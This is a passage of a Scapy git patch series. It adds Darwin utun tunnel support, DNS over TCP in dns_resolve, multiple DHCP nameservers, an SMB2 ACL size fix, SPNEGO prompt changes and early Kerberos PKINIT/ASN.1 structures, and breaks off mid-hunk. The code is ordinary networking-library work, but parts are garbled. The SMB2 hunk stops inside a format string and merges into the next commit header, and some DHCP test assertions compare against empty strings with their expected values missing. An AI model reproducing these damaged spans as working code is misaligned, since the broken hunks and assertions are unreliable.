+++ b/test/regression.uts @@ -2259,6 +2259,12 @@ wrpcapng(tmpfile, p) l = rdpcap(tmpfile) assert l[0].comment == p.comment +p = Ether() / IPv6() / TCP() +p.comments = [b"Hello!", b"Scapy!", b"Pcapng!"] +wrpcapng(tmpfile, p) +l = rdpcap(tmpfile) +assert l[0].comments == p.comments + = rdpcap on fifo ~ linux f = get_temp_file() From e35797ee72513efb291df13f91f8e808d524eae5 Mon Sep 17 00:00:00 2001 From: 0x-0ddc0de <133626972+0x-0ddc0de@users.noreply.github.com> Date: Sat, 13 Sep 2025 14:16:20 -0700 Subject: [PATCH 1541/1632] Tun: add support for Darwin utun interface (#4816) * Tun: add support for Darwin utun interface Fixes #4049 Darwin creates tunnel interfaces differently than BSD, breaking the existing handling which is based on generic BSD `tun`. This commit adds a new tunnel layer specific to the Darwin utun interface. * replace darwin test tag with osx tag --------- Co-authored-by: wl --- scapy/layers/tuntap.py | 88 ++++++++++++++++++++++++++++++++---------- test/tuntap.uts | 20 ++++++++++ 2 files changed, 88 insertions(+), 20 deletions(-) diff --git a/scapy/layers/tuntap.py b/scapy/layers/tuntap.py index e87cf21892b..19a3e289f0b 100644 --- a/scapy/layers/tuntap.py +++ b/scapy/layers/tuntap.py @@ -10,25 +10,30 @@ These allow Scapy to act as the remote side of a virtual network interface. """ - import socket import time from fcntl import ioctl -from scapy.compat import raw, bytes_encode +from scapy.compat import bytes_encode, raw from scapy.config import conf -from scapy.consts import BIG_ENDIAN, BSD, LINUX +from scapy.consts import BIG_ENDIAN, BSD, DARWIN, LINUX from scapy.data import ETHER_TYPES, MTU -from scapy.error import warning, log_runtime -from scapy.fields import Field, FlagsField, StrFixedLenField, XShortEnumField +from scapy.error import log_runtime, warning +from scapy.fields import ( + BitField, + Field, + FlagsField, + IntField, + StrFixedLenField, + XShortEnumField, +) from scapy.interfaces import network_name from scapy.layers.inet import IP -from scapy.layers.inet6 import IPv46, IPv6 +from scapy.layers.inet6 import IPv6, IPv46 from scapy.layers.l2 import Ether -from scapy.packet import Packet +from scapy.packet import Packet, bind_layers from scapy.supersocket import SimpleSocket - # Linux-specific defines (/usr/include/linux/if_tun.h) LINUX_TUNSETIFF = 0x400454ca LINUX_IFF_TUN = 0x0001 @@ -36,6 +41,11 @@ LINUX_IFF_NO_PI = 0x1000 LINUX_IFNAMSIZ = 16 +# Darwin-specific defines (net/if_utun.h and sys/kern_control.h) +DARWIN_CTLIOCGINFO = 0xc0644e03 +DARWIN_UTUN_CONTROL_NAME = b"com.apple.net.utun_control" +DARWIN_MAX_KCTL_NAME = 96 + class NativeShortField(Field): def __init__(self, name, default): @@ -61,6 +71,18 @@ class LinuxTunIfReq(Packet): ] +class DarwinUtunIfReq(Packet): + """ + Structure for issuing Darwin ioctl commands (``struct ctl_info``). + + See net/if_utun.h and sys/kern_control.h for reference. + """ + fields_desc = [ + BitField("ctl_id", 0, -32), + StrFixedLenField("ctl_name", DARWIN_UTUN_CONTROL_NAME, DARWIN_MAX_KCTL_NAME) + ] + + class LinuxTunPacketInfo(TunPacketInfo): """ Base for TUN packets. @@ -78,6 +100,12 @@ class LinuxTunPacketInfo(TunPacketInfo): ] +class DarwinUtunPacketInfo(Packet): + fields_desc = [ + IntField("addr_family", socket.AF_INET) + ] + + class TunTapInterface(SimpleSocket): """ A socket to act as the host's peer of a tun / tap interface. @@ -116,7 +144,7 @@ def __init__(self, iface=None, mode_tun=None, default_read_size=MTU, self.mode_tun = mode_tun if self.mode_tun is None: - if self.iface.startswith(b"tun"): + if self.iface.startswith(b"tun") or self.iface.startswith(b"utun"): self.mode_tun = True elif self.iface.startswith(b"tap"): self.mode_tun = False @@ -152,23 +180,38 @@ def __init__(self, iface=None, mode_tun=None, default_read_size=MTU, warning("Linux interface names are limited to %d bytes, " "truncating!" % (LINUX_IFNAMSIZ,)) self.iface = self.iface[:LINUX_IFNAMSIZ] - + sock = open(devname, "r+b", buffering=0) elif BSD: # also DARWIN - if not (self.iface.startswith(b"tap") or - self.iface.startswith(b"tun")): + if self.iface.startswith(b"utun"): # allowed for Darwin + if not DARWIN: + raise ValueError('`utun` iface prefix is only allowed for Darwin') + self.kernel_packet_class = DarwinUtunPacketInfo + self.mtu_overhead = 4 + interface_num = int(self.iface[4:]) + + utun_socket = socket.socket( + socket.PF_SYSTEM, socket.SOCK_DGRAM, socket.SYSPROTO_CONTROL) + ctl_info = ioctl(utun_socket, DARWIN_CTLIOCGINFO, + raw(DarwinUtunIfReq())) + utun_socket.connect( + (DarwinUtunIfReq(ctl_info).getfieldval("ctl_id"), interface_num + 1) + ) + + sock = utun_socket.makefile(mode="rwb", buffering=0) + elif self.iface.startswith(b"tap") or self.iface.startswith(b"tun"): + devname = b"/dev/" + self.iface + if not self.strip_packet_info: + warning("tun/tap devices on BSD and Darwin never include " + "packet info!") + self.strip_packet_info = True + sock = open(devname, "r+b", buffering=0) + else: raise ValueError("Interface names must start with `tun` or " - "`tap` on BSD and Darwin") - devname = b"/dev/" + self.iface - if not self.strip_packet_info: - warning("tun/tap devices on BSD and Darwin never include " - "packet info!") - self.strip_packet_info = True + "`tap` on BSD and Darwin or `utun` on Darwin") else: raise NotImplementedError("TunTapInterface is not supported on " "this platform!") - sock = open(devname, "r+b", buffering=0) - if LINUX: if self.mode_tun: flags = LINUX_IFF_TUN @@ -241,3 +284,8 @@ def send(self, x): except socket.error: log_runtime.error("%s send", self.__class__.__name__, exc_info=True) + + +# Bindings # +bind_layers(DarwinUtunPacketInfo, IP, addr_family=socket.AF_INET) +bind_layers(DarwinUtunPacketInfo, IPv6, addr_family=socket.AF_INET6) diff --git a/test/tuntap.uts b/test/tuntap.uts index 6017818fa52..1ba470ea175 100644 --- a/test/tuntap.uts +++ b/test/tuntap.uts @@ -23,6 +23,26 @@ assert p.type == 0x86dd assert isinstance(p.payload, IPv6) +####### ++ Test Darwin-specific protocol headers for utun +~ osx utun not_libpcap + += Darwin-specific protocol headers + +p = DarwinUtunPacketInfo()/IP() +assert p.addr_family == 2 + +p = DarwinUtunPacketInfo(raw(p)) +assert p.addr_family == 2 +assert isinstance(p.payload, IP) + +p = DarwinUtunPacketInfo()/IPv6() +assert p.addr_family == 30 + +p = DarwinUtunPacketInfo(raw(p)) +assert p.addr_family == 30 +assert isinstance(p.payload, IPv6) + ####### + Test tun device From c7aa3e9762b601dee7723d1cbaa1a16988adbab3 Mon Sep 17 00:00:00 2001 From: Ebrix Date: Sun, 14 Sep 2025 15:00:33 +0200 Subject: [PATCH 1542/1632] Fix AclSize computation: issue #4831 (#4832) Co-authored-by: Ebrix --- scapy/layers/smb2.py | 8 +++++++- test/scapy/layers/smb2.uts | 2 ++ 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index d76f982b745..7d17e828375 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -1505,8 +1505,14 @@ class WINNT_ACL(Packet): fields_desc = [ ByteField("AclRevision", 2), ByteField("Sbz1", 0x00), + # Total size including header: + # AclRevision(1) + Sbz1(1) + AclSize(2) + AceCount(2) + Sbz2(2) FieldLenField( - "AclSize", None, length_of="Aces", adjust=lambda _, x: x + 14, fmt=" Date: Mon, 15 Sep 2025 23:45:32 +0200 Subject: [PATCH 1543/1632] DNS over TCP: support dns_resolve (#4835) --- scapy/layers/dns.py | 24 +++++++++++++++++++----- test/regression.uts | 9 ++------- 2 files changed, 21 insertions(+), 12 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 3681696a7b7..864ead516ad 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -1271,9 +1271,10 @@ def __getattr__(self, attr): class DNS(DNSCompressedPacket): name = "DNS" + FORCE_TCP = False fields_desc = [ ConditionalField(ShortField("length", None), - lambda p: isinstance(p.underlayer, TCP)), + lambda p: p.FORCE_TCP or isinstance(p.underlayer, TCP)), ShortField("id", 0), BitField("qr", 0, 1), BitEnumField("opcode", 0, 4, {0: "QUERY", 1: "IQUERY", 2: "STATUS"}), @@ -1300,7 +1301,7 @@ class DNS(DNSCompressedPacket): def get_full(self): # Required for DNSCompressedPacket - if isinstance(self.underlayer, TCP): + if isinstance(self.underlayer, TCP) or self.FORCE_TCP: return self.original[2:] else: return self.original @@ -1332,7 +1333,10 @@ def mysummary(self): ) def post_build(self, pkt, pay): - if isinstance(self.underlayer, TCP) and self.length is None: + if ( + (isinstance(self.underlayer, TCP) or self.FORCE_TCP) and + self.length is None + ): pkt = struct.pack("!H", len(pkt) - 2) + pkt[2:] return pkt + pay @@ -1363,6 +1367,14 @@ def pre_dissect(self, s): return s +class DNSTCP(DNS): + """ + A DNS packet that is always under TCP + """ + FORCE_TCP = True + match_subclass = True + + bind_layers(UDP, DNS, dport=5353) bind_layers(UDP, DNS, sport=5353) bind_layers(UDP, DNS, dport=53) @@ -1413,16 +1425,18 @@ def dns_resolve(qname, qtype="A", raw=False, tcp=False, verbose=1, timeout=3, ** try: # Spawn a socket, connect to the nameserver on port 53 if tcp: + cls = DNSTCP sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) else: + cls = DNS sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(kwargs["timeout"]) sock.connect((nameserver, 53)) # Connected. Wrap it with DNS - sock = StreamSocket(sock, DNS) + sock = StreamSocket(sock, cls) # I/O res = sock.sr1( - DNS(qd=[DNSQR(qname=qname, qtype=qtype)], id=RandShort()), + cls(qd=[DNSQR(qname=qname, qtype=qtype)], id=RandShort()), **kwargs, ) except IOError as ex: diff --git a/test/regression.uts b/test/regression.uts index 0cd5b0e1479..97bba309ca8 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -3500,16 +3500,11 @@ import socket sck = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sck.connect(("8.8.8.8", 53)) -class DNSTCP(Packet): - name = "DNS over TCP" - fields_desc = [ FieldLenField("len", None, fmt="!H", length_of="dns"), - PacketLenField("dns", 0, DNS, length_from=lambda p: p.len)] - ssck = StreamSocket(sck, DNSTCP) -r = ssck.sr1(DNSTCP(dns=DNS(rd=1, qd=DNSQR(qname="www.example.com"))), timeout=3) +r = ssck.sr1(DNSTCP(rd=1, qd=DNSQR(qname="www.example.com")), timeout=3) sck.close() -assert DNSTCP in r and len(r.dns.an) +assert DNSTCP in r and len(r.an) ############ + Tests of SSLStreamContext From b6734244ab939e250f89832cf5ef2547c5cf5677 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 15 Sep 2025 23:45:37 +0200 Subject: [PATCH 1544/1632] DHCP_am: support multiple nameservers (#4834) * DHCP_am: support multiple nameservers * Fix dhcpd IPython test --------- Co-authored-by: Mike Zeng --- scapy/layers/dhcp.py | 39 +++++++++++++++++++++++++++---------- test/answering_machines.uts | 11 +++++++++++ test/scapy/layers/dhcp.uts | 11 ++++++++++- 3 files changed, 50 insertions(+), 11 deletions(-) diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 8b679bfbf36..693a21aa8b7 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -61,6 +61,13 @@ from scapy.error import warning from scapy.config import conf +# Typing imports +from typing import ( + List, + Optional, + Union, +) + dhcpmagic = b"c\x82Sc" @@ -601,20 +608,21 @@ class BOOTP_am(AnsweringMachine): filter = "udp and port 68 and port 67" def parse_options(self, - pool=Net("192.168.1.128/25"), - network="192.168.1.0/24", - gw="192.168.1.1", - nameserver=None, - domain=None, - renewal_time=60, - lease_time=1800, + pool: Union[Net, List[str]] = Net("192.168.1.128/25"), + network: str = "192.168.1.0/24", + gw: str = "192.168.1.1", + nameserver: Union[str, List[str]] = None, + domain: Optional[str] = None, + renewal_time: int = 60, + lease_time: int = 1800, **kwargs): """ :param pool: the range of addresses to distribute. Can be a Net, a list of IPs or a string (always gives the same IP). :param network: the subnet range :param gw: the gateway IP (can be None) - :param nameserver: the DNS server IP (by default, same than gw) + :param nameserver: the DNS server IP (by default, same than gw). + This can also be a list. :param domain: the domain to advertise (can be None) Other DHCP parameters can be passed as kwargs. See DHCPOptions in dhcp.py. @@ -622,6 +630,11 @@ def parse_options(self, dhcpd(pool=Net("10.0.10.0/24"), network="10.0.0.0/8", gw="10.0.10.1", classless_static_routes=["1.2.3.4/32:9.8.7.6"]) + + Other example with different options:: + + dhcpd(pool=Net("10.0.10.0/24"), network="10.0.0.0/8", gw="10.0.10.1", + nameserver=["8.8.8.8", "4.4.4.4"], domain="DOMAIN.LOCAL") """ self.domain = domain netw, msk = (network.split("/") + ["32"])[:2] @@ -630,7 +643,13 @@ def parse_options(self, self.network = ltoa(atol(netw) & msk) self.broadcast = ltoa(atol(self.network) | (0xffffffff & ~msk)) self.gw = gw - self.nameserver = nameserver or gw + if nameserver is None: + self.nameserver = (gw,) + elif isinstance(nameserver, str): + self.nameserver = (nameserver,) + else: + self.nameserver = tuple(nameserver) + if isinstance(pool, str): pool = Net(pool) if isinstance(pool, Iterable): @@ -691,7 +710,7 @@ def make_reply(self, req): ("server_id", self.gw), ("domain", self.domain), ("router", self.gw), - ("name_server", self.nameserver), + ("name_server", *self.nameserver), ("broadcast_address", self.broadcast), ("subnet_mask", self.netmask), ("renewal_time", self.renewal_time), diff --git a/test/answering_machines.uts b/test/answering_machines.uts index bee850405cb..15a8e01e436 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -39,12 +39,23 @@ test_am(BOOTP_am, def check_DHCP_am_reply(packet): assert DHCP in packet and len(packet[DHCP].options) assert ("domain", b"localnet") in packet[DHCP].options + assert ('name_server', '192.168.1.1') in packet[DHCP].options + +def check_ns_DHCP_am_reply(packet): + assert DHCP in packet and len(packet[DHCP].options) + assert ("domain", b"localnet") in packet[DHCP].options + assert ('name_server', '1.1.1.1', '2.2.2.2') in packet[DHCP].options test_am(DHCP_am, Ether()/IP()/UDP()/BOOTP(op=1)/DHCP(options=[('message-type', 'request')]), check_DHCP_am_reply, domain="localnet") +test_am(DHCP_am, + Ether()/IP()/UDP()/BOOTP(op=1)/DHCP(options=[('message-type', 'request')]), + check_ns_DHCP_am_reply, + domain="localnet", + nameserver=["1.1.1.1", "2.2.2.2"]) = ARP_am def check_ARP_am_reply(packet): diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index fd953f551d5..4c92d438a5e 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -125,5 +125,14 @@ assert DHCPRevOptions['static-routes'][0] == 33 assert dhcpd import IPython -assert IPython.lib.pretty.pretty(dhcpd) == '' + +result = IPython.lib.pretty.pretty(dhcpd) +result + +# 3 results depending on the Python version +assert result in [ + '', + '', + '', +] From aa1fe527665a407d46a4c83fa77a23114c9e3624 Mon Sep 17 00:00:00 2001 From: "Teppei.F" <37261985+T3pp31@users.noreply.github.com> Date: Wed, 17 Sep 2025 00:48:00 +0900 Subject: [PATCH 1545/1632] DHCP: fix iteration of random options (#4837) --- scapy/layers/dhcp.py | 3 +++ test/scapy/layers/dhcp.uts | 2 +- 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 693a21aa8b7..39250cf74a8 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -409,6 +409,9 @@ def _fix(self): op.append((o.name, r)) return op + def __iter__(self): + return iter(self._fix()) + class DHCPOptionsField(StrField): """ diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index 4c92d438a5e..3b32690a2b9 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -54,6 +54,7 @@ assert s5 == b'E\x00\x01&\x00\x01\x00\x00@\x11{\xc4\x7f\x00\x00\x01\x7f\x00\x00\ pkt = fuzz(DHCP()) assert isinstance(pkt.options, RandDHCPOptions) +pkt.show() pkt = DHCP(bytes(pkt)) pkt.show() @@ -135,4 +136,3 @@ assert result in [ '', '', ] - From befe516630aed0df69a30993e689cb69379985a1 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 18 Sep 2025 08:39:48 +0200 Subject: [PATCH 1546/1632] Update DHCP function assertions for compatibility --- test/scapy/layers/dhcp.uts | 1 + 1 file changed, 1 insertion(+) diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index 3b32690a2b9..8b226b267af 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -132,6 +132,7 @@ result # 3 results depending on the Python version assert result in [ + '', '', '', '', From 5eb00ba933168c22fb5b65b3345fe5aed592483f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 21 Sep 2025 12:16:58 +0200 Subject: [PATCH 1547/1632] SPNEGO.from_cli_arguments: don't ask for password when unrequired (#4839) --- scapy/layers/spnego.py | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/scapy/layers/spnego.py b/scapy/layers/spnego.py index 75ee2202416..3afb73268ed 100644 --- a/scapy/layers/spnego.py +++ b/scapy/layers/spnego.py @@ -669,6 +669,7 @@ def from_cli_arguments( if not valid_ip(target): hostname = target target = str(Net(target)) + # Check UPN try: _, realm = _parse_upn(UPN) @@ -678,12 +679,23 @@ def from_cli_arguments( except ValueError: # not a UPN: NTLM only kerberos = False + # Do we need to ask the password? - if HashNt is None and password is None and ST is None: + if all( + x is None + for x in [ + ST, + password, + HashNt, + HashAes256Sha96, + HashAes128Sha96, + ] + ): # yes. from prompt_toolkit import prompt password = prompt("Password: ", is_password=True) + ssps = [] # Kerberos if kerberos and hostname: @@ -731,11 +743,13 @@ def from_cli_arguments( "Kerberos required but domain not specified in the UPN, " "or target isn't a hostname !" ) + # NTLM if not kerberos_required: if HashNt is None and password is not None: HashNt = MD4le(password) ssps.append(NTLMSSP(UPN=UPN, HASHNT=HashNt)) + # Build the SSP return cls(ssps) From 2beb66c40514e8c3e6d3f21e4fbcf2efad94b608 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 21 Sep 2025 20:05:05 +0200 Subject: [PATCH 1548/1632] Preliminary work for PKINIT support (#4840) --- scapy/asn1/asn1.py | 14 +- scapy/asn1/mib.py | 50 +++++ scapy/asn1fields.py | 33 +++- scapy/layers/kerberos.py | 330 ++++++++++++++++++++++++++++----- scapy/layers/tls/cert.py | 29 ++- scapy/layers/x509.py | 227 ++++++++++++++++++++++- test/scapy/layers/kerberos.uts | 52 ++++++ 7 files changed, 666 insertions(+), 69 deletions(-) diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index 0783a3b3a77..bd58715e26d 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -93,7 +93,7 @@ def _fix(self, n=0): return o(GeneralizedTime()._fix()) elif issubclass(o, ASN1_STRING): z1 = int(random.expovariate(0.05) + 1) - return o("".join(random.choice(self.chars) for _ in range(z1))) + return o("".join(random.choice(self.chars) for _ in range(z1)).encode()) elif issubclass(o, ASN1_SEQUENCE) and (n < 10): z2 = int(random.expovariate(0.08) + 1) return o([self.__class__(objlist=self.objlist)._fix(n + 1) @@ -520,7 +520,7 @@ def __repr__(self): ) -class ASN1_STRING(ASN1_Object[str]): +class ASN1_STRING(ASN1_Object[bytes]): tag = ASN1_Class_UNIVERSAL.STRING @@ -555,11 +555,11 @@ class ASN1_UTF8_STRING(ASN1_STRING): tag = ASN1_Class_UNIVERSAL.UTF8_STRING -class ASN1_NUMERIC_STRING(ASN1_STRING): +class ASN1_NUMERIC_STRING(ASN1_Object[str]): tag = ASN1_Class_UNIVERSAL.NUMERIC_STRING -class ASN1_PRINTABLE_STRING(ASN1_STRING): +class ASN1_PRINTABLE_STRING(ASN1_Object[str]): tag = ASN1_Class_UNIVERSAL.PRINTABLE_STRING @@ -579,7 +579,7 @@ class ASN1_GENERAL_STRING(ASN1_STRING): tag = ASN1_Class_UNIVERSAL.GENERAL_STRING -class ASN1_GENERALIZED_TIME(ASN1_STRING): +class ASN1_GENERALIZED_TIME(ASN1_Object[str]): """ Improved version of ASN1_GENERALIZED_TIME, properly handling time zones and all string representation formats defined by ASN.1. These are: @@ -723,7 +723,7 @@ def __repr__(self): # type: () -> str return "<%s[%r]>" % ( self.__dict__.get("name", self.__class__.__name__), - self.val.decode("utf-16be"), # type: ignore + self.val.decode("utf-16be"), ) @@ -742,7 +742,7 @@ class ASN1_SET(ASN1_SEQUENCE): tag = ASN1_Class_UNIVERSAL.SET -class ASN1_IPADDRESS(ASN1_STRING): +class ASN1_IPADDRESS(ASN1_Object[str]): tag = ASN1_Class_UNIVERSAL.IPADDRESS diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index 16820fb30dd..029f8281225 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -260,6 +260,23 @@ def load_mib(filenames): "1.3.14.3.2.29": "sha1RSASign", } +# nist # + +nist_oids = { + "2.16.840.1.101.3.4.2.1": "sha256", + "2.16.840.1.101.3.4.2.2": "sha384", + "2.16.840.1.101.3.4.2.3": "sha512", + "2.16.840.1.101.3.4.2.4": "sha224", + "2.16.840.1.101.3.4.2.5": "sha512-224", + "2.16.840.1.101.3.4.2.6": "sba512-256", + "2.16.840.1.101.3.4.2.7": "sha3-224", + "2.16.840.1.101.3.4.2.8": "sha3-256", + "2.16.840.1.101.3.4.2.9": "sha3-384", + "2.16.840.1.101.3.4.2.10": "sha3-512", + "2.16.840.1.101.3.4.2.11": "shake128", + "2.16.840.1.101.3.4.2.12": "shake256", +} + # thawte # thawte_oids = { @@ -267,6 +284,12 @@ def load_mib(filenames): "1.3.101.113": "Ed448", } +# pkcs7 # + +pkcs7_oids = { + "1.2.840.113549.1.7.2": "id-signedData", +} + # pkcs9 # pkcs9_oids = { @@ -471,6 +494,7 @@ def load_mib(filenames): "2.5.29.69": "id-ce-holderNameConstraints", # [MS-WCCE] "1.3.6.1.4.1.311.2.1.14": "CERT_EXTENSIONS", + "1.3.6.1.4.1.311.10.3.4": "szOID_EFS_CRYPTO", "1.3.6.1.4.1.311.20.2": "ENROLL_CERTTYPE", "1.3.6.1.4.1.311.25.1": "NTDS_REPLICATION", "1.3.6.1.4.1.311.25.2": "NTDS_CA_SECURITY_EXT", @@ -560,6 +584,12 @@ def load_mib(filenames): "1.2.840.10045.4.3.4": "ecdsa-with-SHA512" } +# ansi-x942 # + +x942KeyType_oids = { + "1.2.840.10046.2.1": "dhpublicnumber", # RFC3770 sect 4.1.1 +} + # elliptic curves # ansiX962Curve_oids = { @@ -672,11 +702,29 @@ def load_mib(filenames): '1.3.6.1.4.1.311.2.2.30': 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism', } +# kerberos # + +kerberos_oids = { + "1.3.6.1.5.2.3.1": "id-pkinit-authData", + "1.3.6.1.5.2.3.2": "id-pkinit-DHKeyData", + "1.3.6.1.5.2.3.3": "id-pkinit-rkeyData", + "1.3.6.1.5.2.3.4": "id-pkinit-KPClientAuth", + "1.3.6.1.5.2.3.5": "id-pkinit-KPKdc", + # RFC8363 + "1.3.6.1.5.2.3.6": "id-pkinit-kdf", + "1.3.6.1.5.2.3.6.1": "id-pkinit-kdf-sha1", + "1.3.6.1.5.2.3.6.2": "id-pkinit-kdf-sha256", + "1.3.6.1.5.2.3.6.3": "id-pkinit-kdf-sha512", + "1.3.6.1.5.2.3.6.4": "id-pkinit-kdf-sha384", +} + x509_oids_sets = [ pkcs1_oids, secsig_oids, + nist_oids, thawte_oids, + pkcs7_oids, pkcs9_oids, attributeType_oids, certificateExtension_oids, @@ -690,9 +738,11 @@ def load_mib(filenames): evPolicy_oids, x962KeyType_oids, x962Signature_oids, + x942KeyType_oids, ansiX962Curve_oids, certicomCurve_oids, gssapi_oids, + kerberos_oids, ] x509_oids = {} diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 9603526c29a..f2d8613af37 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -606,6 +606,8 @@ def i2repr(self, pkt, x): # type: (ASN1_Packet, _I) -> str if self.holds_packets: return super(ASN1F_SEQUENCE_OF, self).i2repr(pkt, x) # type: ignore + elif x is None: + return "[]" else: return "[%s]" % ", ".join( self.fld.i2repr(pkt, x) for x in x # type: ignore @@ -979,7 +981,7 @@ class ASN1F_STRING_PacketField(ASN1F_STRING): def i2m(self, pkt, val): # type: (ASN1_Packet, Any) -> bytes if hasattr(val, "ASN1_root"): - val = ASN1_STRING(bytes(val)) # type: ignore + val = ASN1_STRING(bytes(val)) return super(ASN1F_STRING_PacketField, self).i2m(pkt, val) def any2i(self, pkt, x): @@ -987,3 +989,32 @@ def any2i(self, pkt, x): if hasattr(x, "add_underlayer"): x.add_underlayer(pkt) return super(ASN1F_STRING_PacketField, self).any2i(pkt, x) + + +class ASN1F_STRING_ENCAPS(ASN1F_STRING_PacketField): + """ + ASN1F_STRING that encapsulates a single ASN1 packet. + """ + + def __init__(self, + name, # type: str + default, # type: Optional[ASN1_Packet] + cls, # type: Type[ASN1_Packet] + context=None, # type: Optional[Any] + implicit_tag=None, # type: Optional[int] + explicit_tag=None, # type: Optional[int] + ): + # type: (...) -> None + self.cls = cls + super(ASN1F_STRING_ENCAPS, self).__init__( + name, + default and bytes(default), # type: ignore + context=context, + implicit_tag=implicit_tag, + explicit_tag=explicit_tag + ) + + def m2i(self, pkt, s): # type: ignore + # type: (ASN1_Packet, bytes) -> Tuple[ASN1_Packet, bytes] + val = super(ASN1F_STRING_ENCAPS, self).m2i(pkt, s) + return self.cls(val[0].val, _underlayer=pkt), val[1] diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 39e734fe724..05b65057581 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -13,6 +13,7 @@ - Kerberos Pre-Authentication: RFC6113 (FAST) - Kerberos Principal Name Canonicalization and Cross-Realm Referrals: RFC6806 - Microsoft Windows 2000 Kerberos Change Password and Set Password Protocols: RFC3244 +- PKINIT and its extensions: RFC4556, RFC8070, RFC8636 and [MS-PKCA] - User to User Kerberos Authentication: draft-ietf-cat-user2user-03 - Public Key Cryptography Based User-to-User Authentication (PKU2U): draft-zhu-pku2u-09 - Initial and Pass Through Authentication Using Kerberos V5 (IAKERB): @@ -69,20 +70,22 @@ ASN1_Codecs, ) from scapy.asn1fields import ( + ASN1F_BIT_STRING_ENCAPS, ASN1F_BOOLEAN, ASN1F_CHOICE, + ASN1F_enum_INTEGER, ASN1F_FLAGS, ASN1F_GENERAL_STRING, ASN1F_GENERALIZED_TIME, ASN1F_INTEGER, ASN1F_OID, + ASN1F_optional, ASN1F_PACKET, - ASN1F_SEQUENCE, ASN1F_SEQUENCE_OF, - ASN1F_STRING, + ASN1F_SEQUENCE, + ASN1F_STRING_ENCAPS, ASN1F_STRING_PacketField, - ASN1F_enum_INTEGER, - ASN1F_optional, + ASN1F_STRING, ) from scapy.asn1packet import ASN1_Packet from scapy.automaton import Automaton, ATMT @@ -141,7 +144,16 @@ from scapy.layers.inet import TCP, UDP from scapy.layers.smb import _NV_VERSION from scapy.layers.smb2 import STATUS_ERREF -from scapy.layers.x509 import X509_AlgorithmIdentifier +from scapy.layers.tls.cert import Cert, PrivKey +from scapy.layers.x509 import ( + _CMS_ENCAPSULATED, + CMS_ContentInfo, + CMS_IssuerAndSerialNumber, + DHPublicKey, + X509_AlgorithmIdentifier, + X509_DirectoryName, + X509_SubjectPublicKeyInfo, +) # Redirect exports from RFC3961 try: @@ -1192,7 +1204,8 @@ class KrbFastResponse(ASN1_Packet): _PADATA_CLASSES[136] = (PA_FX_FAST_REQUEST, PA_FX_FAST_REPLY) -# RFC 4556 + +# RFC 4556 - PKINIT # sect 3.2.1 @@ -1202,13 +1215,20 @@ class ExternalPrincipalIdentifier(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( ASN1F_optional( - ASN1F_STRING("subjectName", "", implicit_tag=0xA0), + ASN1F_STRING_ENCAPS( + "subjectName", None, X509_DirectoryName, implicit_tag=0x80 + ), ), ASN1F_optional( - ASN1F_STRING("issuerAndSerialNumber", "", implicit_tag=0xA1), + ASN1F_STRING_ENCAPS( + "issuerAndSerialNumber", + None, + CMS_IssuerAndSerialNumber, + implicit_tag=0x81, + ), ), ASN1F_optional( - ASN1F_STRING("subjectKeyIdentifier", "", implicit_tag=0xA2), + ASN1F_STRING("subjectKeyIdentifier", "", implicit_tag=0x82), ), ) @@ -1216,7 +1236,12 @@ class ExternalPrincipalIdentifier(ASN1_Packet): class PA_PK_AS_REQ(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( - ASN1F_STRING("signedAuthpack", "", implicit_tag=0xA0), + ASN1F_STRING_ENCAPS( + "signedAuthpack", + CMS_ContentInfo(), + CMS_ContentInfo, + implicit_tag=0x80, + ), ASN1F_optional( ASN1F_SEQUENCE_OF( "trustedCertifiers", @@ -1233,16 +1258,115 @@ class PA_PK_AS_REQ(ASN1_Packet): _PADATA_CLASSES[16] = PA_PK_AS_REQ + +# [MS-PKCA] sect 2.2.3 + + +class PAChecksum2(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_STRING("checksum", "", explicit_tag=0xA0), + ASN1F_PACKET( + "algorithmIdentifier", + X509_AlgorithmIdentifier(), + X509_AlgorithmIdentifier, + explicit_tag=0xA1, + ), + ) + 